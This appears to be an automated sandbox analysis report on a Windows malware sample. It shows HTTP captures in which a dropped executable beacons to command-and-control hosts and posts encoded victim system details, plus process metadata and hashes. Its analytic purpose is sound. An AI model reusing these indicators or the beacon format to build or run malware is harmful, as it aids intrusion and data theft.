                                                                                                                                                                                                                                                                                          Data Raw: 37 39 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 70 61 64 72 75 70 26 23 34 36 3b 63 6f 6d 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66
                                                                                                                                                                                                                                                                                          Data Ascii: 793<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>padrup&#46;com</title><meta http-equiv="Content-Type" content="text/html; charset=utf
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:23.641271114 CEST1236INData Raw: 2d 38 22 2f 3e 0a 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 6c 61 6e 67 75 61 67 65 3d 27 4a 61 76 61 53 63 72 69 70 74 27 3e 0a 76 61 72 20 64 6f 6d 61 69 6e 20 3d 20 27 70 61 64 72 75 70
                                                                                                                                                                                                                                                                                          Data Ascii: -8"/><script type='text/javascript' language='JavaScript'>var domain = 'padrup.com';var uniqueTrackingID = 'MTcyOTI0ODMyMy4yNTI5OjZkOGQ2YTE0ZGI3YjIxMjY3ODMwMmMyYTA0ZjllYjdhMjA0OTM0Yjg0ODllYjU4YzE1ZjUzOTZhMzViZTVlODk6NjcxMjNjNDMzZGJmZQ==';
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:23.641330004 CEST424INData Raw: 29 20 3d 3d 3d 20 27 27 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6e
                                                                                                                                                                                                                                                                                          Data Ascii: ) === '') { return; } console.log(JSON.parse(xhr.responseText)) } else { console.log('There was a problem with the request.'); } } }
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:23.641710997 CEST340INData Raw: 0d 0a 31 34 36 0d 0a 64 65 32 33 37 62 66 27 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 6c 61 6e 67 75 61 67 65 3d 27 4a 61 76 61 53 63 72 69 70 74 27 3e
                                                                                                                                                                                                                                                                                          Data Ascii: 146de237bf');</script><script type='text/javascript' language='JavaScript'>window.onload = function() {if(clickTracking && typeof track_onclick == 'function') track_onclick("6568ca3c198765a2c3c6d04aa2e4186282ac1f83");top.location.h


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          78192.168.2.950060190.120.227.918080800C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:23.722795963 CEST169OUTGET /sobakavolos.gif?328f1419=848237593 HTTP/1.1
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
                                                                                                                                                                                                                                                                                          Host: 190.120.227.91:8080
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          79192.168.2.950061185.53.178.5080800C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:28.268994093 CEST158OUTGET /sobaka1.gif?331ed01f=-1728675592 HTTP/1.1
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
                                                                                                                                                                                                                                                                                          Host: padrup.com
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:29.316989899 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                          Date: Fri, 18 Oct 2024 10:45:29 GMT
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                          X-Redirect: skenzo
                                                                                                                                                                                                                                                                                          X-Buckets: bucket102
                                                                                                                                                                                                                                                                                          X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_B2ikytowZxV6PPup8cT/sfcAS1jtzvpAu3Rx1H+3OMNSfTpQcRFbncGTIfCa8i/bL6EFHxWTFoXwwqfojF7YIQ==
                                                                                                                                                                                                                                                                                          X-Template: tpl_CleanPeppermintBlack_twoclick
                                                                                                                                                                                                                                                                                          X-Language: english
                                                                                                                                                                                                                                                                                          Accept-CH: viewport-width
                                                                                                                                                                                                                                                                                          Accept-CH: dpr
                                                                                                                                                                                                                                                                                          Accept-CH: device-memory
                                                                                                                                                                                                                                                                                          Accept-CH: rtt
                                                                                                                                                                                                                                                                                          Accept-CH: downlink
                                                                                                                                                                                                                                                                                          Accept-CH: ect
                                                                                                                                                                                                                                                                                          Accept-CH: ua
                                                                                                                                                                                                                                                                                          Accept-CH: ua-full-version
                                                                                                                                                                                                                                                                                          Accept-CH: ua-platform
                                                                                                                                                                                                                                                                                          Accept-CH: ua-platform-version
                                                                                                                                                                                                                                                                                          Accept-CH: ua-arch
                                                                                                                                                                                                                                                                                          Accept-CH: ua-model
                                                                                                                                                                                                                                                                                          Accept-CH: ua-mobile
                                                                                                                                                                                                                                                                                          Accept-CH-Lifetime: 30
                                                                                                                                                                                                                                                                                          X-Pcrew-Ip-Organization: QuadraNet
                                                                                                                                                                                                                                                                                          X-Pcrew-Blocked-Reason: hosting network
                                                                                                                                                                                                                                                                                          X-Domain: padrup.com
                                                                                                                                                                                                                                                                                          X-Subdomain:
                                                                                                                                                                                                                                                                                          Data Raw: 31 65 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 70 61 64 72 75 70 26 23 34 36 3b 63 6f 6d 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66
                                                                                                                                                                                                                                                                                          Data Ascii: 1e0<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>padrup&#46;com</title><meta http-equiv="Content-Type" content="text/html; charset=utf
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:29.317040920 CEST203INData Raw: 2d 38 22 2f 3e 0a 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 6c 61 6e 67 75 61 67 65 3d 27 4a 61 76 61 53 63 72 69 70 74 27 3e 0a 76 61 72 20 64 6f 6d 61 69 6e 20 3d 20 27 70 61 64 72 75 70
                                                                                                                                                                                                                                                                                          Data Ascii: -8"/><script type='text/javascript' language='JavaScript'>var domain = 'padrup.com';var uniqueTrackingID = 'MTcyOTI0ODMyOC45NjQ1OmNjMDE0ZGUyODBkNzBmNmFjYmYzMDA5ODA0Y2EwNTU4M2ViODZlN2ZiOTU0OTU2OWNh
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:29.317079067 CEST1236INData Raw: 36 66 39 0d 0a 4d 6d 52 6a 5a 6a 41 30 4d 6d 5a 6b 5a 47 51 31 4f 54 49 36 4e 6a 63 78 4d 6a 4e 6a 4e 44 68 6c 59 6a 64 68 4f 51 3d 3d 27 3b 0a 76 61 72 20 63 6c 69 63 6b 54 72 61 63 6b 69 6e 67 20 3d 20 66 61 6c 73 65 3b 0a 76 61 72 20 74 68 65
                                                                                                                                                                                                                                                                                          Data Ascii: 6f9MmRjZjA0MmZkZGQ1OTI6NjcxMjNjNDhlYjdhOQ==';var clickTracking = false;var themedata = '';var xkw = '';var xsearch = '';var xpcat = '';var bucket = '';var clientID = '';var clientIDs = '';var num_ads = 0;var adtest = 'off';var scr
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:29.317114115 CEST561INData Raw: 74 68 65 20 72 65 71 75 65 73 74 2e 27 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 7d 0a 20 20 20 20 0a 20 20 20 20 78 68 72 2e 6f 70 65 6e 28 27 47 45 54 27 2c 20 70 61 74 68 20 2b 20 27 2f 6c 73
                                                                                                                                                                                                                                                                                          Data Ascii: the request.'); } } } xhr.open('GET', path + '/ls.p' + 'hp?t=67123c49&token=' + encodeURI(token), true); xhr.send();};ls(new XMLHttpRequest(), scriptPath, '3f6882a11ce430d639f45a82c6ede111cfa208d2');</scr


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          80192.168.2.950062190.120.227.918080800C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:29.672257900 CEST170OUTGET /sobakavolos.gif?3337cce9=1720097375 HTTP/1.1
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
                                                                                                                                                                                                                                                                                          Host: 190.120.227.91:8080
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          81192.168.2.950063194.5.152.215807352C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:33.008384943 CEST453OUTPOST /n/tasks.php HTTP/1.0
                                                                                                                                                                                                                                                                                          Host: n.ddnsgratis.com.br
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:39.0) Gecko/20100101 Firefox/38.0
                                                                                                                                                                                                                                                                                          Content-type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                          Cookie: auth=bc00595440e801f8a5d2a2ad13b9791b
                                                                                                                                                                                                                                                                                          Content-length: 192
                                                                                                                                                                                                                                                                                          Data Raw: 5f 77 76 3d 59 32 31 6b 4a 6a 6c 6c 4d 54 51 32 59 6d 55 35 4c 57 4d 33 4e 6d 45 74 4e 44 63 79 4d 43 31 69 59 32 52 69 4c 54 55 7a 4d 44 45 78 59 6a 67 33 59 6d 51 77 4e 69 5a 6b 52 32 78 31 57 56 4e 42 4e 6b 6c 47 55 6b 70 55 61 30 56 30 56 55 56 4e 5a 30 39 70 51 54 52 4f 65 6d 63 77 54 56 52 46 4a 54 4e 45 4a 6c 64 70 62 6d 52 76 64 33 4d 6c 4d 6a 41 78 4d 43 55 79 4d 43 67 32 4e 43 31 69 61 58 51 70 4a 6a 45 6d 56 32 6c 75 5a 47 39 33 63 79 55 79 4d 45 52 6c 5a 6d 56 75 5a 47 56 79 4a 6a 55 75 4d 53 59 78 4f 43 34 78 4d 43 34 79 4d 44 49 30 4a 6b 35 50 54 6b 55 3d 0a
                                                                                                                                                                                                                                                                                          Data Ascii: _wv=Y21kJjllMTQ2YmU5LWM3NmEtNDcyMC1iY2RiLTUzMDExYjg3YmQwNiZkR2x1WVNBNklGUkpUa0V0VUVNZ09pQTROemcwTVRFJTNEJldpbmRvd3MlMjAxMCUyMCg2NC1iaXQpJjEmV2luZG93cyUyMERlZmVuZGVyJjUuMSYxOC4xMC4yMDI0Jk5PTkU=
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:38.939764023 CEST606INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                          Date: Fri, 18 Oct 2024 10:45:33 GMT
                                                                                                                                                                                                                                                                                          Server: Apache/2.4.17 (Win32) OpenSSL/1.0.2d PHP/5.6.14
                                                                                                                                                                                                                                                                                          X-Powered-By: PHP/5.6.14
                                                                                                                                                                                                                                                                                          Status: 404 Not Found
                                                                                                                                                                                                                                                                                          Content-Length: 377
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=utf8
                                                                                                                                                                                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 6e 2f 74 61 73 6b 73 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 0d 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 3c 21 [TRUNCATED]
                                                                                                                                                                                                                                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /n/tasks.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>...-MTQwMTA3NjM4NjcxNTc2NiNyYXRlIDUj--->


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          82192.168.2.950064185.53.178.5080800C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:35.067480087 CEST156OUTGET /sobaka1.gif?33c00681=914368262 HTTP/1.1
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
                                                                                                                                                                                                                                                                                          Host: padrup.com
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:36.073040009 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                          Date: Fri, 18 Oct 2024 10:45:35 GMT
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                          X-Redirect: skenzo
                                                                                                                                                                                                                                                                                          X-Buckets: bucket102
                                                                                                                                                                                                                                                                                          X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_NYgiROPGw6JVTkhV3wd1IW+dXbNmsB6Qi6qFEANNUNJRg8YQ2EIZo2iXSeurW8o7zjqcnxZ8Wv7XXGwxGRdDXw==
                                                                                                                                                                                                                                                                                          X-Template: tpl_CleanPeppermintBlack_twoclick
                                                                                                                                                                                                                                                                                          X-Language: english
                                                                                                                                                                                                                                                                                          Accept-CH: viewport-width
                                                                                                                                                                                                                                                                                          Accept-CH: dpr
                                                                                                                                                                                                                                                                                          Accept-CH: device-memory
                                                                                                                                                                                                                                                                                          Accept-CH: rtt
                                                                                                                                                                                                                                                                                          Accept-CH: downlink
                                                                                                                                                                                                                                                                                          Accept-CH: ect
                                                                                                                                                                                                                                                                                          Accept-CH: ua
                                                                                                                                                                                                                                                                                          Accept-CH: ua-full-version
                                                                                                                                                                                                                                                                                          Accept-CH: ua-platform
                                                                                                                                                                                                                                                                                          Accept-CH: ua-platform-version
                                                                                                                                                                                                                                                                                          Accept-CH: ua-arch
                                                                                                                                                                                                                                                                                          Accept-CH: ua-model
                                                                                                                                                                                                                                                                                          Accept-CH: ua-mobile
                                                                                                                                                                                                                                                                                          Accept-CH-Lifetime: 30
                                                                                                                                                                                                                                                                                          X-Pcrew-Ip-Organization: QuadraNet
                                                                                                                                                                                                                                                                                          X-Pcrew-Blocked-Reason: hosting network
                                                                                                                                                                                                                                                                                          X-Domain: padrup.com
                                                                                                                                                                                                                                                                                          X-Subdomain:
                                                                                                                                                                                                                                                                                          Data Raw: 31 65 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 70 61 64 72 75 70 26 23 34 36 3b 63 6f 6d 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66
                                                                                                                                                                                                                                                                                          Data Ascii: 1eb<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>padrup&#46;com</title><meta http-equiv="Content-Type" content="text/html; charset=utf
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:36.073067904 CEST212INData Raw: 2d 38 22 2f 3e 0a 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 6c 61 6e 67 75 61 67 65 3d 27 4a 61 76 61 53 63 72 69 70 74 27 3e 0a 76 61 72 20 64 6f 6d 61 69 6e 20 3d 20 27 70 61 64 72 75 70
                                                                                                                                                                                                                                                                                          Data Ascii: -8"/><script type='text/javascript' language='JavaScript'>var domain = 'padrup.com';var uniqueTrackingID = 'MTcyOTI0ODMzNS42OTExOjZjNzA5MDdmODA3NTc1NmI3NDc4YmVkOTExYzMwMmMxMzQzZjNjMDMyNWI2NzgzNzIzNjIyNDVkM2Q
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:36.073091984 CEST2INData Raw: 0d 0a
                                                                                                                                                                                                                                                                                          Data Ascii:
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:36.073106050 CEST1236INData Raw: 36 65 61 0d 0a 32 4d 54 51 30 4f 57 55 36 4e 6a 63 78 4d 6a 4e 6a 4e 47 5a 68 4f 47 4a 6a 4e 51 3d 3d 27 3b 0a 76 61 72 20 63 6c 69 63 6b 54 72 61 63 6b 69 6e 67 20 3d 20 66 61 6c 73 65 3b 0a 76 61 72 20 74 68 65 6d 65 64 61 74 61 20 3d 20 27 27
                                                                                                                                                                                                                                                                                          Data Ascii: 6ea2MTQ0OWU6NjcxMjNjNGZhOGJjNQ==';var clickTracking = false;var themedata = '';var xkw = '';var xsearch = '';var xpcat = '';var bucket = '';var clientID = '';var clientIDs = '';var num_ads = 0;var adtest = 'off';var scriptPath = '
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:36.073122025 CEST546INData Raw: 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 7d 0a 20 20 20 20 0a 20 20 20 20 78 68 72 2e 6f 70 65 6e 28 27 47 45 54 27 2c 20 70 61 74 68 20 2b 20 27 2f 6c 73 2e 70 27 20 2b 20 27 68 70 3f 74 3d 36 37 31
                                                                                                                                                                                                                                                                                          Data Ascii: } } } xhr.open('GET', path + '/ls.p' + 'hp?t=67123c4f&token=' + encodeURI(token), true); xhr.send();};ls(new XMLHttpRequest(), scriptPath, '0ed5555189fac69ab5a504bf29336c4b251dae7e');</script><script


                                                                                                                                                                                                                                                                                          Statistics

                                                                                                                                                                                                                                                                                          CPU Usage

                                                                                                                                                                                                                                                                                          Click to jump to process

                                                                                                                                                                                                                                                                                          Memory Usage

                                                                                                                                                                                                                                                                                          Click to jump to process

                                                                                                                                                                                                                                                                                          High Level Behavior Distribution

                                                                                                                                                                                                                                                                                          Click to dive into process behavior distribution

                                                                                                                                                                                                                                                                                          Behavior

                                                                                                                                                                                                                                                                                          Click to jump to process

                                                                                                                                                                                                                                                                                          System Behavior

                                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                                          Target ID:1
                                                                                                                                                                                                                                                                                          Start time:06:41:29
                                                                                                                                                                                                                                                                                          Start date:18/10/2024
                                                                                                                                                                                                                                                                                          Path:C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exe
                                                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                          Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exe"
                                                                                                                                                                                                                                                                                          Imagebase:0xab0000
                                                                                                                                                                                                                                                                                          File size:2'496'512 bytes
                                                                                                                                                                                                                                                                                          MD5 hash:FA45B9C5E2A92B1B3D7D175C23FFC813
                                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                                          Target ID:2
                                                                                                                                                                                                                                                                                          Start time:06:41:29
                                                                                                                                                                                                                                                                                          Start date:18/10/2024
                                                                                                                                                                                                                                                                                          Path:C:\Windows\System32\fontdrvhost.exe
                                                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                          Commandline:"fontdrvhost.exe"
                                                                                                                                                                                                                                                                                          Imagebase:0x7ff6791b0000
                                                                                                                                                                                                                                                                                          File size:827'408 bytes
                                                                                                                                                                                                                                                                                          MD5 hash:BBCB897697B3442657C7D6E3EDDBD25F
                                                                                                                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                          Reputation:moderate
                                                                                                                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                                          Target ID:4
                                                                                                                                                                                                                                                                                          Start time:06:41:29
                                                                                                                                                                                                                                                                                          Start date:18/10/2024
                                                                                                                                                                                                                                                                                          Path:C:\Windows\System32\fontdrvhost.exe
                                                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                          Commandline:"fontdrvhost.exe"
                                                                                                                                                                                                                                                                                          Imagebase:0x7ff6791b0000
                                                                                                                                                                                                                                                                                          File size:827'408 bytes
                                                                                                                                                                                                                                                                                          MD5 hash:BBCB897697B3442657C7D6E3EDDBD25F
                                                                                                                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                          Reputation:moderate
                                                                                                                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                                          Target ID:6
                                                                                                                                                                                                                                                                                          Start time:06:41:29
                                                                                                                                                                                                                                                                                          Start date:18/10/2024
                                                                                                                                                                                                                                                                                          Path:C:\Windows\System32\dwm.exe
                                                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                          Commandline:"dwm.exe"
                                                                                                                                                                                                                                                                                          Imagebase:0x7ff6f73e0000
                                                                                                                                                                                                                                                                                          File size:94'720 bytes
                                                                                                                                                                                                                                                                                          MD5 hash:5C27608411832C5B39BA04E33D53536C
                                                                                                                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                          Reputation:moderate
                                                                                                                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                                          Target ID:10
                                                                                                                                                                                                                                                                                          Start time:06:41:34
                                                                                                                                                                                                                                                                                          Start date:18/10/2024
                                                                                                                                                                                                                                                                                          Path:C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
                                                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                          Commandline:C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
                                                                                                                                                                                                                                                                                          Imagebase:0x970000
                                                                                                                                                                                                                                                                                          File size:2'496'512 bytes
                                                                                                                                                                                                                                                                                          MD5 hash:FA45B9C5E2A92B1B3D7D175C23FFC813
                                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                          Antivirus matches:
                                                                                                                                                                                                                                                                                          • Detection: 95%, ReversingLabs
